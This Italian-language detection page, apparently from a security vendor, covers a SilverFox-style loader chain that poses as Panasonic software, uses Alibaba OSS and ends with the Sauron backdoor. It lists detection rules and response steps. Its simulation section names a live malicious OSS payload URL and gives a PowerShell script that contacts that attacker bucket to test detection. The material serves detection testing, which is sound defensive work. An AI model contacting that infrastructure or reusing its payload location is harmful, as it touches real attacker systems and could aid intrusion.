Catena di caricamento in stile SilverFox utilizza Panasonic Shells, Alibaba OSS e Sauron
Detection stack
- AIDR
- Alert
- ETL
- Query
Sommario
Questa minaccia si concentra su una catena di caricamento multifase altamente sofisticata, mascherata come software legittimo di Panasonic. Il malware utilizza Alibaba OSS per fornire payload e si basa su vettori cifrati basati su immagini che utilizzano un caratteristico formato trailer EOF a cinque byte. La sua fase finale distribuisce il backdoor Sauron, che mantiene la persistenza attraverso la creazione di servizi e modifiche mirate al registro.
Indagine
Gli analisti hanno condotto sia analisi statiche che dinamiche e hanno scoperto una sequenza di operazioni di side-loading che coinvolgono binari etichettati come software di Tencent e Philips. L’indagine ha esposto una routine di decrittazione stratificata che utilizza incrementando XOR e RC4, insieme alla creazione di attività pianificate tramite meccanismi RPC. La forensi della memoria e la telemetria sandbox hanno aiutato a ricostruire il percorso completo di esecuzione, dal wrapper iniziale a tema Panasonic al backdoor finale Sauron.
Mitigazione
Le organizzazioni dovrebbero monitorare la pianificazione non autorizzata di attività basate su RPC e la creazione sospetta di attività pianificate tramite NdrClientCall3. Un forte allowlisting delle applicazioni può aiutare a bloccare l’esecuzione di DLL side-loaded non approvate. I difensori dovrebbero anche prestare attenzione all’eliminazione inattesa delle copie shadow del volume e alle modifiche del registro sospette sotto HKCUSOFTWARE.
Risposta
Se viene rilevata questa attività, isolare immediatamente i sistemi interessati per interrompere ulteriori movimenti laterali o comunicazioni di comando e controllo. Effettuare analisi della memoria per identificare i moduli iniettati e determinare lo stadio attuale della catena di caricamento. Anche i log di rete dovrebbero essere esaminati per il traffico verso l’infrastruttura Alibaba OSS e gli indirizzi IP di comando e controllo noti identificati durante il triage.
Flusso di Attacco
Rilevazioni
Esecuzione di Processi di Sistema da Percorsi Non Tipici (tramite creazione_processo)
Proof of Value
Esecuzione Sospetta da Profilo Utente Pubblico (tramite creazione_processo)
Proof of Value
Attività Sospetta VSSADMIN (tramite cmdline)
Proof of Value
Modifiche Sospette alle Preferenze di Windows Defender (tramite PowerShell)
Proof of Value
File Sospetti nel Profilo Utente Pubblico (tramite evento_file)
Proof of Value
Rilevazione di Indicatori di Rete della Catena di Caricamento SilverFox-Style [Connessione di Rete Windows]
Proof of Value
Rilevazione della Catena di Caricamento SilverFox-style utilizzando Eseguibile Trojanizzato Panasonic [Creazione Processo Windows]
Proof of Value
Esecuzione di Simulazione
Prerequisito: Il Controllo Pre-volo Telemetria & Baseline deve essere superato.
Razionale: Questa sezione dettaglia la precisa esecuzione della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirano a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.
-
Narrativa dell’Attacco & Comandi: L’avversario cerca di scaricare un payload di seconda fase utilizzando un servizio di archiviazione cloud legittimo per mimetizzarsi con il traffico normale. L’attaccante utilizza un one-liner PowerShell per simulare un caricatore che effettua una richiesta a un URL conosciuto SilverFox Alibaba OSS:
https://jun616.oss-cn-beijing.aliyuncs.com/tad/payload.exe. Questa azione è intesa a bypassare filtri di dominio semplici sfruttando la reputazione dialiyuncs.commentre si utilizza il percorso specifico malevolo definito nella regola di rilevamento. -
Script di Test di Regressione:
# Simulazione di Indicatore di Rete del Caricatore SilverFox # Questo script tenta di connettersi all'URL specifico monitorato dalla regola Sigma. $targetUrl = "https://jun616.oss-cn-beijing.aliyuncs.com/tad/test_file.txt" Write-Host "[!] Simulazione di connessione di rete SilverFox a: $targetUrl" try { # Utilizzando Invoke-WebRequest per generare la telemetria HTTP proxy standard $response = Invoke-WebRequest -Uri $targetUrl -Method Get -UseBasicParsing Write-Host "[+] Richiesta completata. Codice di Stato: $($response.StatusCode)" } catch { # Ci aspettiamo un errore 404 o di connessione se l'URL non ospita effettivamente un file, # ma il log proxy registrerà comunque il tentativo. Write-Host "[-] Richiesta tentata. Controllare i log proxy per il tentativo di connessione." } -
Comandi di Pulizia:
# Nessun cambiamento persistente apportato da questa simulazione; nessuna pulizia richiesta. Write-Host "[*] Pulizia simulazione completata."